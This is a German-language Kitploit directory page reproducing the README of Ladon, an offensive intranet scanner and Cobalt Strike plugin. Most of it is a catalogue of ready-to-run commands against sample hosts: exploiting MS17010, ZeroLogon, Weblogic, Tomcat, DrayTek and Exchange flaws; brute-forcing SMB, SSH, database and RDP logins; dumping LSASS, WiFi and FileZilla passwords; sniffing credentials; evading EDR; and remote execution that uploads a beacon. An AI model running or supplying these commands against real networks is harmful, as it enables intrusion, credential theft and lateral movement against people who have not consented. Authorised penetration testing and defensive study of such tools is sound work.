Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/k8gege/ladon
Privilege EscalationAufklärungSchwachstellenscannerNetzwerkkartierungPasswortangriffePort-ScanningExploitationLaterale BewegungInformationsbeschaffungWebsicherheitPenetrationstestsSubdomain-Enumeration
GitHubk8gege/ladon

Ladon

Repository anzeigenWebseite
5.3k88218vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Ladon – großer Intranet-Penetrationstest-Scanner, PowerShell- und Cobalt-Strike-Plugin, In-Memory-Loading, dateiloses Scannen. Enthält Port-Scanning, Diensterkennung, Erkennung von Netzwerk-Assets, Passwort-Audit, Erkennung von Hochrisiko-Schwachstellen, Exploit-Ausführung, Passwort-Extraktion sowie Ein-Klick-GetShell. Unterstützt Batch-Scans für A-/B-/C-Netzsegmente sowie segmentübergreifende Scans und unterstützt URL-, Host- und Domain-Listenscans usw. Die Netzwerk-Asset-Erkennung nutzt 32 Protokolle (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) oder Methoden, um schnell IP-Adressen aktiver Hosts im Zielnetzwerk, Computernamen, Arbeitsgruppen, freigegebene Ressourcen, Netzwerkadapter-Adressen, Betriebssystemversionen, Websites, Subdomains, Middleware, offene Dienste, Router, Switches, Datenbanken, Drucker usw. zu ermitteln. Zahlreiche Module zur Erkennung von Hochrisiko-Schwachstellen: MS17010, Zimbra, Exchange.

Teilen

Ladon Großer Intranet-Penetrationsscanner Cobalt Strike Plugin Speicherladen

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

image

Programmübersicht

Ladon großer Intranet-Penetrationsscanner\Domänen-Penetration\horizontale Tools, PowerShell-Modul, Cobalt Strike Plugin, Speicherladen, dateiloser Scan. Enthält Port-Scan, Service-Identifikation, Netzwerkasset-Erkennung, Passwort-Audit, Entdeckung von Hochrisiko-Schwachstellen, Exploit, Passwortlesen und One-Click GetShell, unterstützt Batch-A/B/C-Segment und netzwerksegmentübergreifende Scans, unterstützt URL, Host, Domainenlisten-Scans usw. Version 12.2 enthält 262 Funktionsmodule, Netzwerkasset-Erkennungsmodule mit 30+ Protokollen (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) sowie Methoden zur schnellen Erfassung von Zielnetzwerk-IPs, Computernamen, Arbeitsgruppen, gemeinsam genutzten Ressourcen, Netzwerkadressen, Betriebssystemversionen, Websites, Subdomains, Middleware, offenen Diensten, Routern, Switches, Datenbanken, Druckern usw., Entdeckung von Hochrisiko-Schwachstellen 16+ einschließlich Cisco, Zimbra, Exchange, DrayTek, MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, Struts2-Serie, Printer usw., Passwort-Audit 25+ einschließlich Datenbanken (Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar usw., Remote-Befehlsausführung (smbexec/wmiexe/psexec/atexec/sshexec/webshell), Web-Fingerabdruck-Erkennungsmodul erkennt 135+ (Webanwendungen, Middleware, Skripttypen, Seitentypen) usw., lokale Privilegienausweitung 21+ inklusive SweetPotato\BadPotato\EfsPotato\BypassUAC, hochgradig anpassbare Plugin-POC-Unterstützung für .NET-Assemblys, DLL (C#/Delphi/VC), PowerShell usw., Unterstützung für den Batch-Aufruf beliebiger externer Programme oder Befehle über Konfigurations-INI, EXP-Generator kann mit einem Klick Schwachstellen-POC/EXP generieren, um die Scan-Fähigkeiten schnell zu erweitern, Ladon unterstützt Cobalt Strike pluginifizierten Speicherladen, dateiloses Scannen des Intranets für schnelle horizontale Bewegung.

Ladon Download```Bash

https://github.com/k8gege/Ladon/releases https://k8gege.org/Download

root@kitploit:~
### Einfache Bedienung

Obwohl Ladon viele Funktionen bietet, ist die Bedienung sehr einfach und jeder kann leicht loslegen<br>
Mit nur einem oder zwei Parametern können 90% der Funktionen genutzt werden. Ein Modul entspricht einem neuen Werkzeug

### Laufzeitumgebung

#### Windows

Ladon kann unter Windows mit .NET 2.0 oder höher verwendet werden (ab Windows 7 ist .NET integriert).<br>
Z. B. Cmd, PowerShell, Remote-Cmd, WebShell usw. sowie In-Memory-Laden in Cobalt Strike.<br>
Ladon.ps1 ist voll kompatibel mit PowerShell von Windows 7 bis Windows 11/2025, ermöglicht dateiloses Remote-Laden ohne Versionsprüfung.

#### Plattformübergreifend: LadonGo unterstützt Linux, Mac, Arm, MIPS

Plattformübergreifend: Linux, macOS, Windows, Router, Netzwerkgeräte usw.<br>
https://github.com/k8gege/LadonGo

### Besondere Bedingungen

In der Praxis läuft es nicht immer reibungslos. Manche internen Netzwerk-Weiterleitungen sind langsam oder unmöglich, sodass das Tool auf das Ziel hochgeladen werden muss.<br>
Manchmal dauert es ewig, selbst eine 2-3 MB große Datei hochzuladen, oder es klappt gar nicht. Von Python-Dateien mit mehreren zehn MB ganz zu schweigen.<br>
Ladon ist in C# entwickelt, die Programmgröße beträgt nur etwa 500 KB. Selbst wenn die Verbindung schlecht ist, kann man eine 500 KB große Datei hochladen.<br>
Falls nicht, kann man es per PowerShell remote im Speicher laden – das ist ein Vorteil gegenüber großen kompilierten Programmen in Python oder Go.

### Leitbild

Rundum-Service: Den Benutzern ein einfach zu bedienendes, funktionsreiches und hochflexibles Scan-Tool bieten.

### Merkmale

Geringer Scan-Traffic<br>
Kleine Programmgröße<br>
Reichhaltige und leistungsstarke Funktionen<br>
Einfach und benutzerfreundlich<br>
Plugins unterstützen mehrere Sprachen<br>
Plattformübergreifend (Windows/Kali/Ubuntu) usw.<br>
Unterstützt Cobalt Strike als Plugin<br>
Unterstützt dateilose PowerShell-Penetration<br>
Exp-Generator kann mit einem Klick Pocs erstellen<br>
Mehrere Versionen für verschiedene Umgebungen

### Programmparameter und Funktionen

1  Unterstützt Scannen einer bestimmten IP-Adresse<br>
2  Unterstützt Scannen eines bestimmten Domainnamens<br>
3  Unterstützt Scannen eines bestimmten Rechnernamens<br>
4  Unterstützt Scannen eines bestimmten C-Segments (ip/24)<br>
5  Unterstützt Scannen eines bestimmten B-Segments (ip/16)<br>
6  Unterstützt Scannen eines bestimmten A-Segments (ip/8)<br>
7  Unterstützt Scannen einer bestimmten URL<br>
8  Unterstützt Batch-IP-Scan (ip.txt)<br>
9  Unterstützt Batch-C-Segment-Scan (ip24.txt)<br>
10 Unterstützt Batch-C-Segment-Scan (ipc.txt)<br>
11 Unterstützt Batch-B-Segment-Scan (ip16.txt)<br>
12 Unterstützt Batch-URL-Scan (url.txt)<br>
13 Unterstützt Batch-Domain-Scan (domain.txt)<br>
14 Unterstützt Batch-Rechnernamen-Scan (host.txt)<br>
15 Unterstützt Batch-Länder-Segment-Scan (cidr.txt)<br>
16 Unterstützt Batch-String-Liste (str.txt)<br>
17 Unterstützt Host-Benutzername/Passwort-Liste (check.txt)<br>
18 Unterstützt Benutzer-/Passwort-Liste (userpass.txt)<br>
19 Unterstützt Scannen eines bestimmten C-Segment-Bereichs<br>
20 Unterstützt Laden benutzerdefinierter DLLs per Parameter (nur C#)<br>
21 Unterstützt Laden benutzerdefinierter EXEs per Parameter (nur C#)<br>
22 Unterstützt Laden benutzerdefinierter INI-Konfigurationsdateien per Parameter<br>
23 Unterstützt Laden benutzerdefinierten PowerShell-Codes per Parameter<br>
24 Unterstützt benutzerdefinierte Programme (Systembefehle oder Drittanbieter-Programme, d. h. in beliebigen Sprachen entwickelte Programme oder Skripte)<br>
25 Plugins (unterstützt mehrere Sprachen: C#/Delphi/Golang/Python/VC/PowerShell)<br>
26 Unterstützt Cobalt Strike (Scannen des internen Netzwerks des Ziels über Beacon-Befehlszeile oder Scannen externer Ziele über Sprungbrett)<br>
27 Unterstützt IP-Scan im CIDR-Format, z. B. 100.64.0.0/10, 192.168.1.1/20 usw.<br>
28 INI-Konfiguration unterstützt Passwort-Brute-Force für benutzerdefinierte Programme<br>

### Kurzanleitung

Ladon-Kurzanleitung und vollständige Dokumentation: http://k8gege.org/Ladon <br>
Excel-Modulfunktionsdokument: http://k8gege.org/Ladon/wiki.xlsx <br>
Unterstützt In-Memory-Laden in Cmd, Cobalt Strike, PowerShell usw.<br>
Windows-Version: .NET, Cobalt Strike, PowerShell<br>
Systemübergreifende Versionen: Go (alle Plattformen), Python (theoretisch alle Plattformen)<br>
PS: Study erleichtert das lokale Lernen, für vollständige Funktionen bitte CMD verwenden.

### BypassEDR-Scan

Standardmäßig ist die Scangeschwindigkeit hoch. Manche WAFs oder EDRs haben eine starke Abwehr.<br>
Selbst mit wenigen Threads kann es sein, dass der Scan nach etwa 20 Minuten blockiert wird.<br>
BypassEDR simuliert menschlichen Zugriff, um Geschwindigkeitserkennungsstrategien zu umgehen.<br>

Die Scangeschwindigkeit ist langsamer. Wer auf Schnelligkeit aus ist, sollte es nicht verwenden.<br>```Bash
Ladon 10.1.2.8/24 MS17010 bypassEDR

密码爆破相关模块暂不支持bypassEDR参数

001 自定义线程扫描

例子:扫描目标10.1.2段是否存在MS17010漏洞
单线程:```Bash Ladon 10.1.2.8/24 MS17010 t=1

root@kitploit:~
80 Threads:```Bash
Ladon noping 10.1.2.8/24 MS17010 t=80

Unter starkem Schutz die Scanthread-Einstellungen niedriger setzen, F Einzelthread
```Bash Ladon 10.1.2.8/24 MS17010 f=1

root@kitploit:~
### 002 Socks5-Proxy-Scan
Beispiel: Scannen des Zielsegments 10.1.2 mit 8 Threads auf die MS17010-Schwachstelle<br>```Bash
Ladon noping 10.1.2.8/24 MS17010 t=8

Siehe: http://k8gege.org/Ladon/proxy.html

PS: Der Proxy unterstützt kein Socks5, daher muss der Parameter noping für den Scan hinzugefügt werden
Egal ob Frp oder andere ähnliche Tools, hauptsächlich unterstützen Tools wie Proxifier das ICMP-Protokoll nicht
Weil Ladon standardmäßig zuerst mit ICMP die Erreichbarkeit prüft, bevor es entsprechende Module testet
Daher muss in einer Proxy-Umgebung der Ping-Scan deaktiviert werden, da der System-Ping das ICMP-Protokoll verwendet.


003 Netzsegment-Scan/Massen-Scan

CIDR-Format: nicht nur /24/16/8 (alle)```Bash Ladon 192.168.1.8/24 扫描模块 Ladon 192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块

root@kitploit:~
Buchstabenformat: nur Abschnitt C, Abschnitt B, Abschnitt A, in Reihenfolge sortiert```Bash
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块

0x004 Scan nach IP-Bereich und Subnetz

ICMP-Erkennung von aktiven Hosts im Bereich 50-200```Bash

Ladon 192.168.1.50-192.168.1.200 ICMP

root@kitploit:~
#### ICMP-Erkennung von aktiven Hosts 1.30 bis 50.80```Bash
Ladon 192.168.1.30-192.168.50.80 ICMP  

TXT-Format

004 ICMP-Batch-Scan der C-Segment-Liste auf aktive Hosts```Bash

Ladon ip24.txt ICMP Ladon ipc.txt ICMP

root@kitploit:~
##### 005 ICMP-Massen-Scan der Liste aktiver Hosts im B-Segment```Bash
Ladon ip16.txt ICMP
006 ICMP-Massen-Scan einer CIDR-Liste (z.B. IP-Bereich eines Landes)```Bash

Ladon cidr.txt ICMP

root@kitploit:~
##### 007 ICMP-Massenscan zur Prüfung der Erreichbarkeit von Domains```Bash
Ladon domain.txt ICMP
008 ICMP-Massen-Scan zur Überprüfung, ob Maschinen aktiv sind, unter Verwendung von Hostnamen oder Maschinennamen```Bash

Ladon host.txt ICMP

root@kitploit:~
##### 009 WhatCMS Massenidentifikation von CMS, Bannern, SSL-Zertifikaten, Titeln; kann unbekannte CMS, Router, Drucker, Netzwerkgeräte, Kameras usw. identifizieren```Bash
Ladon 192.168.1.8 WhatCMS   扫描IP
Ladon 192.168.1.8/24 WhatCMS   扫描C段
Ladon 192.168.1.8/C WhatCMS   扫描C段
Ladon 192.168.1.8/B WhatCMS   扫描B段
Ladon 192.168.1.8/A WhatCMS   扫描A段
Ladon IP.TXT WhatCMS   扫描IP列表
Ladon IP24.TXT WhatCMS   扫描C段列表
Ladon IP16.TXT WhatCMS   扫描B段列表
Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS   扫描IP
Ladon noping 192.168.1.8/24 WhatCMS   扫描C段
010 Massenüberprüfung von DrayTek-Router-Versionen, Schwachstellen und schwachen Passwörtern```Bash

Ladon url.txt DraytekPoc

root@kitploit:~
##### 011 Massenentschlüsselung von Base64-Passwörtern```Bash
Ladon str.txt DeBase64

Vermögensscan, Fingerabdruckerkennung, Dienstidentifikation, aktive Hosts, Portscan

image

012 ICMP-Scan nach aktiven Hosts (schnellste)```Bash

Ladon 192.168.1.8/24 ICMP

root@kitploit:~
##### 013 Ping-Erkennung aktiver Hosts (Aufruf des systemeigenen Ping-Befehls, Anzeige von ms, ttl usw.)```Bash
Ladon 192.168.1.8/24 Ping

Wenn du der Meinung bist, dass ein Host nur dann erreichbar ist, wenn der Ping-Befehl erfolgreich ist, kannst du diesen Befehl für die Batch-Verarbeitung verwenden.

014 Multiprotokoll-Erkennung lebender Hosts (IP, Rechnername, MAC/Domäne, Hersteller/Systemversion)```Bash

Ladon 192.168.1.8/24 OnlinePC

root@kitploit:~
##### 015 Mehrprotokoll-Erkennung des Betriebssystems (IP, Maschinenname, Betriebssystemversion, offene Dienste)```Bash
Ladon 192.168.1.8/24 OsInfo
016 OXID Erkennung von Multi-NIC-Hosts```Bash

Ladon 192.168.1.8/24 EthInfo Ladon 192.168.1.8/24 OxidInfo

root@kitploit:~
##### 017 DNS-Erkennung von Multi-NIC-Hosts```Bash
Ladon 192.168.1.8/24 DnsInfo
018 Multi-Protokoll-Scan von aktiven Host-IPs```Bash

Ladon 192.168.1.8/24 OnlineIP

root@kitploit:~
##### 019 Scan der SMB-Schwachstelle MS17010 (IP, Hostname, Schwachstellennummer, Betriebssystemversion)```Bash
Ladon 192.168.1.8/24 MS17010
020 SMBGhost-Schwachstellenerkennung CVE-2020-0796 (IP、Maschinenname、Schwachstellennummer、Betriebssystemversion)```Bash

Ladon 192.168.1.8/24 SMBGhost

root@kitploit:~
##### 021 Web-Titel und Banner scannen – Für vollständigere Informationen verwenden Sie das WhatCMS-Modul```Bash
Ladon 192.168.1.8/24 WebInfo
Ladon http://192.168.1.8 WebInfo
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
022 Scannen von C-Segment-URLs und Domains```Bash

Ladon 192.168.1.8/24 UrlScan

root@kitploit:~
##### 023 URLs und Domains von Sites im C-Netzwerksegment scannen```Bash
Ladon 192.168.1.8/24 SameWeb
024 Scannen von Subdomains und Second-Level-Domains```Bash

Ladon baidu.com SubDomain

root@kitploit:~
##### 025 Domain-Name-Resolution-IP, Hostname-Resolution-IP```Bash
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
025 Batch-Domänenauflösung IP, Batch-Hostnamenauflösung IP```Bash

Ladon domain.txt DomainIP Ladon host.txt HostIP

root@kitploit:~
##### 025 Batch-Auflösung von Domainnamen und Hostnamen – Ergebnis nur IP```Bash
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
026 DNS-Abfrage für Maschinen und IPs in der Domain (innerhalb der Domain, spezifizierte Domänencontroller-IP)```Bash

Ladon AdiDnsDump 192.168.1.8

root@kitploit:~
##### 027 Maschinen und IPs im Domänenbereich abfragen (bedingt innerhalb der Domäne)
Ladon GetDomainIP

##### 028 C-Segment-Ports scannen, bestimmte Ports scannen```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
029 Scannen von C-Segment-Webseiten und CMS-Identifizierung (800+ Web-Fingerprints)```Bash

Ladon 192.168.1.8/24 CMS Ladon 192.168.1.8/24 CmsInfo Ladon 192.168.1.8/24 WhatCMS

root@kitploit:~
##### 030 Cisco-Geräte scannen```Bash
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
031 Enumerate Mssql-Datenbank-Hosts (Datenbank-IP, Rechnername, SQL-Version)```Bash

Ladon EnumMssql

root@kitploit:~
##### 032 Enumeration von Netzwerkfreigaben 	(Domäne, IP, Hostname\Freigabepfad)```Bash
Ladon EnumShare
033 Scan des LDAP-Servers (Erkennung des Domänencontrollers)```Bash

Ladon 192.168.1.8/24 LdapInfo

root@kitploit:~
##### 034 FTP-Server scannen und Version identifizieren```Bash
Ladon 192.168.1.8/24 FtpInfo

Brute-Force/Netzwerkauthentifizierung/Schwachpasswort/Passwortknacken/Datenbank/Website-Backend/Anmeldeseite/Systemanmeldung

image Passwortknacken Details siehe SSH: http://k8gege.org/Ladon/sshscan.html

035 445 Port SMB Passwortknacken (Windows)```Bash

Ladon 192.168.1.8/24 SmbScan

root@kitploit:~
##### 036 Port 135 Wmi Passwort-Brute-Force (Windows)```Bash
Ladon 192.168.1.8/24 WmiScan
037 Port 389 LDAP-Server, AD-Domain Passwort-Brute-Force (Windows)```Bash

Ladon 192.168.1.8/24 LdapScan

root@kitploit:~
##### 038 Port 5985 WinRM Passwort-Brute-Force (Windows)```Bash
Ladon 192.168.1.8/24 WinrmScan
039 Port 445 SMB NTLM HASH Brute-Force(Windows)```Bash

Ladon 192.168.1.8/24 SmbHashScan

root@kitploit:~
##### 040 Port 135 Wmi NTLM HASH Brute Force (Windows)```Bash
Ladon 192.168.1.8/24 WmiHashScan
041 SSH-Passwort-Brute-Force auf Port 22 (Linux)```Bash

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

root@kitploit:~
##### 042 1433端口 Mssql数据库密码爆破```Bash
Ladon 192.168.1.8/24 MssqlScan
043 Port 1521 Oracle-Datenbank-Passwort-Brute-Force```Bash

Ladon 192.168.1.8/24 OracleScan

root@kitploit:~
Oracle-Datenbanken sind besonders: Wenn nur die ORCL-Datenbank geprüft wird, werden viele Berechtigungen übersehen.<br>
Näheres unter: http://k8gege.org/Ladon/OracleScan.html<br>


##### 044 Port 3306 MySQL-Datenbank-Passwort-Cracking```Bash
Ladon 192.168.1.8/24 MysqlScan
045 Port 7001 Weblogic Backend-Passwort-Brute-Force```Bash

Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

root@kitploit:~
##### 046 5900 Port VNC Remote Desktop Passwort-Brute-Force```Bash
Ladon 192.168.1.8/24 VncScan
047 Port 21 FTP-Server Passwort-Brute-Force```Bash

Ladon 192.168.1.8/24 FtpScan

root@kitploit:~
##### 048 Port 8080 Tomcat Backend Anmelde-Passwort Brute-Force```Bash
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
049 Webport 401-Basisauthentifizierung Passwort-Brute-Force```Bash

Ladon http://192.168.1.8/login HttpBasicScan Ladon ip.txt 401Scan

root@kitploit:~
##### 052 Port 139 NetBIOS-Protokoll Windows-Passwort-Brute-Force```Bash
Ladon 192.168.1.8/24 NbtScan
053 Brute-Force von Windows-Passwörtern über WinRM-Protokoll auf Port 5985```Bash

Ladon 192.168.1.8/24 WinrmScan

root@kitploit:~
##### 054 IP-Kamera-Passwort-Cracking (voreingestellte Standardpasswörter)```Bash
Ladon 192.168.1.8/24 DvrScan

Schwachstellenerkennung/PoC

image

055 SMB-Schwachstellenerkennung (CVE-2017-0143/CVE-2017-0144)```Bash

Ladon 192.168.1.8/24 MS17010

root@kitploit:~
##### 056 SMBGhost-Schwachstellenerkennung CVE-2020-0796		911 reserviert```Bash
Ladon 192.168.1.8/24 SMBGhost
057 Weblogic Schwachstellenerkennung(CVE-2019-2725/CVE-2018-2894)```Bash

Ladon 192.168.1.8/24 WeblogicPoc

root@kitploit:~
##### 058 PhpStudy Backdoor-Erkennung (phpstudy 2016/phpstudy 2018)  10.9 entfernt 911 behalten```Bash
Ladon 192.168.1.8/24 PhpStudyPoc
059 ActiveMQ-Schwachstellenerkennung (CVE-2016-3088)```Bash

Ladon 192.168.1.8/24 ActivemqPoc

root@kitploit:~
##### 060 Tomcat-Schwachstellenerkennung (CVE-2017-12615)```Bash
Ladon 192.168.1.8/24 TomcatPoc
061 Struts2-Schwachstellenerkennung (S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode/S2-045/S2-037)```Bash

Ladon 192.168.1.8/24 Struts2Poc

root@kitploit:~
##### 062 DraytekPoc CVE-2020-8515 Schwachstellenerkennung, Draytek-Versionserkennung, Erkennung schwacher Passwörter```Bash
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
FortiGate CVE-2024-55591 Unberechtigte RCE-Schwachstellenerkennung```Bash

Ladon 192.168.1.8/24 CVE-2024-55591

root@kitploit:~
### Schwachstellenausnutzung/Exploit
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 063 Weblogic-Exploit (CVE-2019-2725)```Bash
Ladon 192.168.1.8/24 WeblogicExp
064 Tomcat-Schwachstellenausnutzung (CVE-2017-12615)```Bash

Ladon 192.168.1.8/24 TomcatExp

root@kitploit:~
##### 065 Allgemeiner DLL-Injection-CMD-Generator für Windows 0day-Schwachstellen (DLL nur 5KB)```Bash
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
066 CVE-2021-40444 Microsoft IE/Office Zero-Day-Schwachstelle```Bash

Ladon CVE-2021-40444 MakeCab poc.dll Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

root@kitploit:~
##### 067 DraytekExp CVE-2020-8515 Remote-Befehlsausführung EXP```Bash
Ladon DraytekExp http://192.168.1.8  whoami
068 Domain-Penetration ZeroLogon CVE-2020-1472 Domain-Controller-Privilege-Eskalation (Passwort auf leer setzen)```Bash

Ladon ZeroLogon dc.k8gege.org

root@kitploit:~
##### 069 CVE-2020-0688 Exchange-Serialisierungsschwachstelle (.net 4.0)```Bash
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 ForExec Loop Vulnerability Exploitation (Win10 EternalDarkness CVE-2020-0796, erfolgreich beenden, um einen Blue Screen des Ziels zu vermeiden)```Bash

Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

root@kitploit:~
### Dateidownload, Dateiübertragung

##### 071 Intranet-Dateiübertragung HTTP-Download HTTPS-Download MSF-Download```Bash
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
072 Intranet-Dateiübertragung FtpDownload```Bash

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

root@kitploit:~
### Ver- und Entschlüsselung (HEX/Base64)

##### 073 Hex Ver- und Entschlüsselung```Bash
Ladon 123456 EnHex
Ladon 313233343536 DeHex

074 Base64-Verschlüsselung und -Entschlüsselung```Bash Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 Ladon str.txt DeBase64

root@kitploit:~
### Netzwerk-Sniffing

##### 075 FTP-Passwort-Sniffing (Bindet an lokale IP, automatisches Sniffing des C-Subnetzes)
Maschine mit mehreren Netzwerkkarten, snifft die entsprechenden C-Subnetz-IPs```Bash
Ladon FtpSniffer 192.168.1.5
076 HTTP-Passwort-Sniffing (Bindet die lokale IP, sniffiert automatisch C-Segmente)

Maschinen mit mehreren Netzwerkkarten sniffen die entsprechenden C-Segment-IPs.```Bash Ladon HTTPSniffer 192.168.1.5

root@kitploit:~
##### 077 Netzwerk-Sniffing```Bash
Ladon Sniffer

Passwort lesen

078 IIS-Site-Passwort und Website-Pfad lesen```Bash

Ladon IISpwd

root@kitploit:~
##### 079 Verbundene WIFI-Passwörter auslesen```Bash
Ladon WifiPwd
080 FileZilla FTP-Passwort auslesen```Bash

Ladon FileZillaPwd

root@kitploit:~
##### 081 Lesen von System-Hash, VPN-Passwort, DPAPI-Key  10.9 entfernt```Bash
Ladon CVE-2021-36934  
082 DumpLsass Speicherpasswort (mimikatz Klartext) eingeschränkt auf Versionen vor 9.1.1```Bash

Ladon DumpLsass

root@kitploit:~
### Informationssammlung

![image](http://k8gege.org/k8img/Ladon/Study/Linfo.PNG)

##### 083 API aktuellen Benutzer anzeigen```Bash
Ladon w
Ladon whoami
083 Abrufen der lokalen internen IP und externen IP```Bash

Ladon GetIP Ladon IPinfo

root@kitploit:~
##### 084 Abrufen PCname GUID CPUID DiskID Mac-Adresse```Bash
Ladon GetID
085 Letzte vom Benutzer aufgerufene Dateien anzeigen```Bash

Ladon Recent

root@kitploit:~
##### 086 Anzeige von USB-Stick- und USB-Nutzungsaufzeichnungen (USB-Name, USB-Kennzeichen, Pfadinformationen)```Bash
Ladon UsbLog
087 Erkennung von Hintertüren (Registry-Starteinträge, DLL-Hijacking)```Bash

Ladon CheckDoor Ladon AutoRun

root@kitploit:~
##### 088 Prozessdetails (Programmpfad, Bitanzahl, Startparameter, Benutzer)```Bash
Ladon EnumProcess
Ladon Tasklist
089 Befehlszeilenargumente abrufen```Bash

Ladon cmdline Ladon cmdline cmd.exe

root@kitploit:~
##### 090 Grundlegende Penetrationsinformationen abrufen```Bash
Ladon GetInfo
Ladon GetInfo2
091 .NET & PowerShell-Version```Bash

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

root@kitploit:~
##### 092 Laufzeitversion & Kompilierungsumgebung```Bash
Ladon Ver
Ladon Version
093 Laufzeitversion & Build-Umgebung & Installationssoftwareliste```Bash

Ladon AllVer Ladon AllVersion

root@kitploit:~
##### 094 IE-Proxy-Informationen anzeigen```Bash
Ladon QueryProxy
095 DirList Verzeichnisliste + grundlegende Penetrationsinformationen
Standardmäßig gesamte Festplatte auflisten
```Bash

Ladon DirList

root@kitploit:~
###### Laufwerk oder Verzeichnis angeben```Bash
Ladon DirList c:\   
096 QueryAdmin Administratorbenutzer anzeigen```Bash

Ladon QueryAdmin

root@kitploit:~
##### 097 Lokale Named Pipes anzeigen```Bash
Ladon GetPipe
098 RdpLog 3389 Verbindungsprotokolle anzeigen```Bash

Ladon RdpLog

root@kitploit:~
### Remote-Ausführung (psexec/wmiexec/atexec/sshexec/smbexec)

![image](http://k8gege.org/k8img/Ladon/Study/Rexec.PNG)

##### 099 445 Port Verschlüsselte PSEXEC Remote-Befehlsausführung (interaktiv)```Bash
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
100 135 Ports WmiExec Remote-Befehlsausführung (nicht interaktiv)```Bash

Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 101 Port 445 AtExec Remote Command Execution (Non-Interactive)```Bash
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
102 Port 22 SshExec Remote-Befehlsausführung (nicht interaktiv)```Bash

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

root@kitploit:~
##### 103 JspShell Remote-Befehlausführung (nicht-interaktiv) 9.3.0 entfernt
Verwendung:Ladon JspShell type url pwd cmd```Bash
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
104 WebShell Remote-Befehlsausführung (nicht interaktiv) 9.3.0 entfernt```Bash

Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami 获取系统版本信息 方便提权 Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo

root@kitploit:~
##### 105 135 Port WmiExec2 Remote Command Execution unterstützt HASH (nicht interaktiv) unterstützt Datei-Upload```Bash
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami		 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe  先Mimikatz注入Hash,再pth执行命令
106 Port 445 SmbExec Ntlm-Hash nicht-interaktive Remote-Befehlsausführung (keine Rückmeldung)```Bash

Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 107 WinrmExec Remote-Befehlsausführung ohne Rückmeldung (unterstützt Systemrechte)```Bash
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

Privilegieneskalation und -deeskalation

